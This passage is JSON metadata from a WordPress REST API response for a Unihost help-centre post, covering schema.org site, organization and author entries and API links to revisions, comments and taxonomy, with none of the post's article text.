Compromise"}]},{"@type":"WebSite","@id":"https:\/\/unihost.com\/help\/#website","url":"https:\/\/unihost.com\/help\/","name":"Unihost.FAQ","description":"","publisher":{"@id":"https:\/\/unihost.com\/help\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unihost.com\/help\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en"},{"@type":"Organization","@id":"https:\/\/unihost.com\/help\/#organization","name":"Unihost","alternateName":"Unihost","url":"https:\/\/unihost.com\/help\/","logo":{"@type":"ImageObject","inLanguage":"en","@id":"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/","url":"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png","contentUrl":"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png","width":300,"height":300,"caption":"Unihost"},"image":{"@id":"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/unihost\/","https:\/\/x.com\/unihost","https:\/\/www.instagram.com\/unihost\/?hl=en","https:\/\/www.linkedin.com\/company\/unihost-com","https:\/\/www.youtube.com\/channel\/UCITKsxMDnslQY8brN3advgw"]},{"@type":"Person","@id":"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a","name":"Unihost Support","image":{"@type":"ImageObject","inLanguage":"en","@id":"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g","caption":"Unihost Support"},"sameAs":["https:\/\/unihost.com\/"],"url":"https:\/\/unihost.com\/help\/author\/support\/"}]}},"_links":{"self":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/comments?post=20108"}],"version-history":[{"count":2,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108\/revisions"}],"predecessor-version":[{"id":20335,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108\/revisions\/20335"}],"wp:attachment":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/media?parent=20108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/categories?post=20108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/tags?post=20108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}